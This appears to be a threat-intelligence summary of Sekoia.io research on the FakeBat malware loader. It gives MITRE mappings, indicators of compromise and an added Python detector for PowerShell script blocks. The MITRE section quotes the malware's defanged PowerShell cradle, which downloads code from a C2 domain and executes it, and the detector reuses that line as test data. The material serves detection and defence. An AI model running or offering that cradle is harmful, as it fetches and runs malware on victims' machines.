Sekoia.io reports that FakeBat operates as Malware-as-a-Service, distributing MSIX/MSI loaders via drive-by downloads, malvertising, and fake browser updates across multiple campaigns during 2023–2024. Its operators (including Eugenfest and Payk_34) provide an administration panel to build, manage, and monitor payloads, and have steadily evolved their anti-detection and distribution techniques to keep the MaaS offering viable. #FakeBat #EugenFest
Keypoints
- FakeBat (aka EugenLoader, PaykLoader) was one of the most widespread loaders using drive-by download techniques in 2024.
- Threat actors sell FakeBat as Loader-as-a-Service on cybercrime forums, offering an admin panel to generate builds, manage payloads, and monitor installations.
- A second wave of advertising introduced MSIX as a new loader format and added valid digital signatures to bypass Microsoft SmartScreen and Defender alerts.
- FakeBat distribution clusters rely on malvertising, software impersonation landing pages, fake browser updates, and social engineering on social networks.
- FakeBat operators provide an associated distribution service (Pay-Per-Install style) to deliver payloads on behalf of customers and monetize installations.
- TDR tracks a rotating C2 infrastructure, thousands of compromised/controlled domains, and domain hosting patterns to monitor FakeBat activity and evolution.
MITRE Techniques
- [T1189] Drive-by Compromise – Drive-by download technique to distribute malware via user web browsing. Quote: ‘drive-by download technique to distribute malware via user web browsing. This technique mostly involves SEO-poisoning, malvertising, and code injection into compromised websites to trick users into downloading fake software installers or browser updates.’
- [T1059.001] PowerShell – Initial PowerShell script downloads and executes the next-stage payload from the C2 server. Quote: ‘&{$zqpl='hxxps://utr-krubz[.]com/buy/';$zqplii='lkmns32Sf3lkn';$iiii=(iwr -Uri $zqpl -UserAgent $zqplii -UseBasicParsing).Content; iex $iiii}’
- [T1082] System Information Discovery – The initial PowerShell script fingerprints the infected host (and exfiltrates data) as part of the later C2 communication. Quote: ‘fingerprinted the infected host and exfiltrated the data through its C2 servers to the URL endpoint…’
- [T1071.001] Web Protocols – C2 communications and payload delivery via HTTP(S) endpoints; data exfiltration to C2. Quote: ‘exfiltrated the data through its C2 servers to the URL endpoint av, domain, key, site, status and os.’
- [T1027] Masquerading – Digital signatures added to FakeBat installers in MSIX format to defeat security prompts. Quote: ‘added a digital signature to the FakeBat installer with a valid certificate.’
- [T1562.001] Impair Defenses – Bypassing Google Unwanted Software Policy and Windows Defender alerts (and being protected from VirusTotal). Quote: ‘bypassing the Unwanted Software Policy of Google and Windows Defender alerts and being protected from VirusTotal’.
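The download cradle quoted under T1059.001 is a usable detection hook: a web request whose response body is handed straight to iex, with an opaque key passed as the User-Agent. The Python below is an added example, not code from the Sekoia report, that scores PowerShell script-block text for those traits; the indicator weights, threshold and sample log lines are constructed, with the page's defanged one-liner as the positive case.

```python
import re

# Added illustrative example: indicator weights and sample log lines are
# constructed, not taken from the Sekoia report. Blocks mimic Event ID 4104
# ScriptBlockText; the first is the defanged FakeBat cradle quoted on the page.
SAMPLE_SCRIPT_BLOCKS = [
    "&{$zqpl='hxxps://utr-krubz[.]com/buy/';$zqplii='lkmns32Sf3lkn';"
    "$iiii=(iwr -Uri $zqpl -UserAgent $zqplii -UseBasicParsing).Content; iex $iiii}",
    "Get-ChildItem C:\\Users | Select-Object Name",
    "$r = Invoke-WebRequest -Uri 'https://example.test/update.json' -UseBasicParsing; $r.StatusCode",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('hxxp://example.test/a')",
]

# Indicator name -> (regex, weight). Weights are assumptions chosen so that a
# fetch-then-eval chain crosses the threshold while a plain download does not.
INDICATORS = {
    "web_request": (re.compile(r"\b(iwr|Invoke-WebRequest|Net\.WebClient)\b", re.I), 1),
    "basic_parsing": (re.compile(r"-UseBasicParsing\b", re.I), 1),
    # FakeBat passes its opaque key ('lkmns32Sf3lkn') as the User-Agent via a variable.
    "custom_user_agent": (re.compile(r"-UserAgent\s+\$\w+", re.I), 2),
    "body_to_variable": (re.compile(r"\.(Content|DownloadString)\b", re.I), 1),
    "invoke_expression": (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    "script_block_wrapper": (re.compile(r"^\s*&\s*\{"), 1),
}
THRESHOLD = 5
URL_RE = re.compile(r"(?:hxxps?|https?)://[^'\"\s;)]+", re.I)

def score_block(block: str) -> tuple[int, list[str]]:
    """Return the summed weight and the names of the indicators that matched."""
    hits = [name for name, (rx, _w) in INDICATORS.items() if rx.search(block)]
    return sum(INDICATORS[h][1] for h in hits), hits

def extract_urls(block: str) -> list[str]:
    """Pull (possibly defanged) URLs so an analyst can pivot to the C2 host."""
    return URL_RE.findall(block)

def classify(block: str) -> dict:
    """Score one script block and flag it when it reaches THRESHOLD."""
    score, hits = score_block(block)
    return {"score": score, "hits": hits, "urls": extract_urls(block),
            "suspicious": score >= THRESHOLD}

def triage(blocks: list[str]) -> list[dict]:
    """Classify every block in a batch of script-block log entries."""
    return [classify(b) for b in blocks]

if __name__ == "__main__":
    for res in triage(SAMPLE_SCRIPT_BLOCKS):
        print(res)
```

The flagged entry's extracted URL (still defanged here) is the value to pivot on against the domain and IP indicators listed below.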
Indicators of Compromise
- [Domain] 0212top.online, 0212top.site – FakeBat C2 hosting domains used in Aug–Dec 2023 (and related clusters).
- [Domain] utr-krubz[.]com, monkeybeta[.]com – C2/infrastructure domains observed in distribution campaigns.
- [IP] 62.204.41.98 – All domains in a set were hosted on this IP from Dec 2023 to Jun 2024.
- [Hash] c336d98d8d4810666ee4693e8c3a2a34191bad864d6b46e468a7eed36e7085f4 – MSIX file hash.
- [Hash] 7265ffdbe31dd96d6e6c8ead5a56817c905ff012418546e2233b7dce22372630 – MSIX file hash.
- [Hash] 9aa39f017b50dcc2214ce472d3967721c676a7826030c2e34cb95c495dba4960 – MSIX file hash.
- [File] Getmess.msix – Malicious package used in social-engineering/distribution campaigns (web3 cluster).
- [File] iiU.ps1 (iiu.ps1) – Initial PowerShell script filename used in FakeBat campaigns.
Read more: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/